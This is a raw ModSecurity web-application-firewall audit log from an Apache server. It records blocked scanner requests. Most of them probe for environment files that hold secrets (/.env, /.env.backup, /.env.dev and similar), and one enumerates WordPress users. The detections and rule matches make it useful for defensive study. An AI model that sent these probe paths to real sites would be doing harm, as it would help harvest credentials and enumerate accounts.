[client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746019705009353 761 (- - -) Stopwatch2: 1746019705009353 761; combined=318, p1=276, p2=0, p3=0, p4=0, p5=41, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16838239-Z-- --33304a59-A-- [30/Apr/2025:21:00:43 +0700] aBItC9mPDA_SdVd56wCb6gAAAMA 103.236.140.4 38484 103.236.140.4 8181 --33304a59-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.62.87.47 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.62.87.47 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --33304a59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33304a59-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746021643125226 527 (- - -) Stopwatch2: 1746021643125226 527; combined=220, p1=194, p2=0, p3=0, p4=0, p5=26, sr=47, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33304a59-Z-- --43e63d04-A-- [30/Apr/2025:21:04:51 +0700] aBIuAzsHLQ2TK6eM3erKGgAAAJY 103.236.140.4 51914 103.236.140.4 8181 --43e63d04-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept-Charset: utf-8 --43e63d04-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43e63d04-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746021891683717 640 (- - -) Stopwatch2: 1746021891683717 640; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43e63d04-Z-- --2ec5f51f-A-- [30/Apr/2025:22:49:46 +0700] aBJGmtmPDA_SdVd56wD4yAAAANg 103.236.140.4 57522 103.236.140.4 8181 --2ec5f51f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ec5f51f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ec5f51f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746028186717470 3210 (- - -) Stopwatch2: 1746028186717470 3210; combined=1802, p1=492, p2=1281, p3=0, p4=0, p5=29, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ec5f51f-Z-- --71469047-A-- [30/Apr/2025:22:49:54 +0700] aBJGoj1td-6YjlnYDRKUKwAAAAs 103.236.140.4 57932 103.236.140.4 8181 --71469047-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.204 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71469047-C-- demo.sayHello --71469047-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71469047-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746028194136676 6265 (- - -) Stopwatch2: 1746028194136676 6265; combined=4575, p1=612, p2=3720, p3=31, p4=36, p5=102, sr=118, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71469047-Z-- --5c22870c-A-- [01/May/2025:02:48:20 +0700] aBJ-hDsHLQ2TK6eM3erE6QAAAI4 103.236.140.4 33516 103.236.140.4 8181 --5c22870c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.56 Safari/537.4 Accept-Charset: utf-8 --5c22870c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c22870c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746042500203042 855 (- - -) Stopwatch2: 1746042500203042 855; combined=388, p1=351, p2=0, p3=0, p4=0, p5=37, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c22870c-Z-- --9a511d48-A-- [01/May/2025:03:12:13 +0700] aBKEHdBN0baiHx4WjiYfNQAAAEg 103.236.140.4 55054 103.236.140.4 8181 --9a511d48-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Symbian/3; Series60/5.2 NokiaX7-00/021.004; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.21 Mobile Safari/533.4 3gpp-gba Accept-Charset: utf-8 --9a511d48-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a511d48-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746043933462859 627 (- - -) Stopwatch2: 1746043933462859 627; combined=235, p1=206, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a511d48-Z-- --724fd218-A-- [01/May/2025:03:32:05 +0700] aBKIxeVeTgVPHjrSAYCpBwAAAAw 103.236.140.4 53168 103.236.140.4 8181 --724fd218-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.105 Safari/537.36 Vivaldi/2.4.1488.38 Accept-Charset: utf-8 --724fd218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --724fd218-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746045125142698 829 (- - -) Stopwatch2: 1746045125142698 829; combined=327, p1=291, p2=0, p3=0, p4=0, p5=36, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --724fd218-Z-- --8f009708-A-- [01/May/2025:04:04:27 +0700] aBKQW-VeTgVPHjrSAYCs2wAAAAg 103.236.140.4 60942 103.236.140.4 8181 --8f009708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --8f009708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f009708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746047067126599 882 (- - -) Stopwatch2: 1746047067126599 882; combined=375, p1=337, p2=0, p3=0, p4=0, p5=38, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f009708-Z-- --b3c83708-A-- [01/May/2025:04:04:28 +0700] aBKQXMVMAgMJpNzaVtJUuwAAAFA 103.236.140.4 60950 103.236.140.4 8181 --b3c83708-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.252.208 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.252.208 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b3c83708-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3c83708-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746047068257946 817 (- - -) Stopwatch2: 1746047068257946 817; combined=330, p1=291, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3c83708-Z-- --8e135b7d-A-- [01/May/2025:04:55:32 +0700] aBKcVCgtr0Qsi1mFAsO-XwAAAIk 103.236.140.4 50940 103.236.140.4 8181 --8e135b7d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.71.77.17 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.71.77.17 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8e135b7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e135b7d-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746050132983763 840 (- - -) Stopwatch2: 1746050132983763 840; combined=322, p1=283, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e135b7d-Z-- --59d0b77f-A-- [01/May/2025:05:35:47 +0700] aBKlw8VMAgMJpNzaVtJb5wAAAEg 103.236.140.4 60372 103.236.140.4 8181 --59d0b77f-B-- GET /.env.stage HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --59d0b77f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59d0b77f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052547129567 791 (- - -) Stopwatch2: 1746052547129567 791; combined=362, p1=326, p2=0, p3=0, p4=0, p5=36, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --59d0b77f-Z-- --3b817077-A-- [01/May/2025:05:35:47 +0700] aBKlw8VMAgMJpNzaVtJb6QAAAEs 103.236.140.4 60378 103.236.140.4 8181 --3b817077-B-- GET /.env.test HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --3b817077-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b817077-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052547780401 765 (- - -) Stopwatch2: 1746052547780401 765; combined=298, p1=262, p2=0, p3=0, p4=0, p5=35, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b817077-Z-- --492ada66-A-- [01/May/2025:05:35:48 +0700] aBKlxOVeTgVPHjrSAYCzxQAAAAw 103.236.140.4 60380 103.236.140.4 8181 --492ada66-B-- GET /.env.backup HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --492ada66-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --492ada66-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052548434919 745 (- - -) Stopwatch2: 1746052548434919 745; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --492ada66-Z-- --b5ff8672-A-- [01/May/2025:05:35:49 +0700] aBKlxeVeTgVPHjrSAYCzxgAAAAs 103.236.140.4 60386 103.236.140.4 8181 --b5ff8672-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --b5ff8672-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ff8672-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052549081501 719 (- - -) Stopwatch2: 1746052549081501 719; combined=325, p1=291, p2=0, p3=0, p4=0, p5=33, sr=127, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ff8672-Z-- --d3d4bd72-A-- [01/May/2025:05:35:49 +0700] aBKlxcVMAgMJpNzaVtJb6wAAAE0 103.236.140.4 60388 103.236.140.4 8181 --d3d4bd72-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --d3d4bd72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3d4bd72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052549729394 709 (- - -) Stopwatch2: 1746052549729394 709; combined=282, p1=247, p2=0, p3=0, p4=0, p5=35, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3d4bd72-Z-- --437c1d79-A-- [01/May/2025:05:35:50 +0700] aBKlxuVeTgVPHjrSAYCzxwAAAAo 103.236.140.4 60394 103.236.140.4 8181 --437c1d79-B-- GET /build/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --437c1d79-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --437c1d79-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052550377082 728 (- - -) Stopwatch2: 1746052550377082 728; combined=316, p1=277, p2=0, p3=0, p4=0, p5=39, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --437c1d79-Z-- --dce33d24-A-- [01/May/2025:05:35:51 +0700] aBKlx8VMAgMJpNzaVtJb7AAAAE8 103.236.140.4 60400 103.236.140.4 8181 --dce33d24-B-- GET /.env.default HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --dce33d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dce33d24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052551032922 794 (- - -) Stopwatch2: 1746052551032922 794; combined=337, p1=300, p2=0, p3=0, p4=0, p5=37, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dce33d24-Z-- --4e763f2e-A-- [01/May/2025:05:35:51 +0700] aBKlx8VMAgMJpNzaVtJb7gAAAFM 103.236.140.4 60406 103.236.140.4 8181 --4e763f2e-B-- GET /.env.live HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --4e763f2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4e763f2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052551687480 720 (- - -) Stopwatch2: 1746052551687480 720; combined=276, p1=234, p2=0, p3=0, p4=0, p5=42, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e763f2e-Z-- --4601d456-A-- [01/May/2025:05:35:52 +0700] aBKlyOVeTgVPHjrSAYCzyQAAABA 103.236.140.4 60410 103.236.140.4 8181 --4601d456-B-- GET /.env.sandbox HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --4601d456-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4601d456-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052552335144 739 (- - -) Stopwatch2: 1746052552335144 739; combined=329, p1=291, p2=0, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4601d456-Z-- --e1c2c11b-A-- [01/May/2025:05:35:52 +0700] aBKlyOVeTgVPHjrSAYCzygAAAA4 103.236.140.4 60412 103.236.140.4 8181 --e1c2c11b-B-- GET /api/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 179.43.152.115 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 179.43.152.115 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --e1c2c11b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1c2c11b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746052552984273 640 (- - -) Stopwatch2: 1746052552984273 640; combined=248, p1=216, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
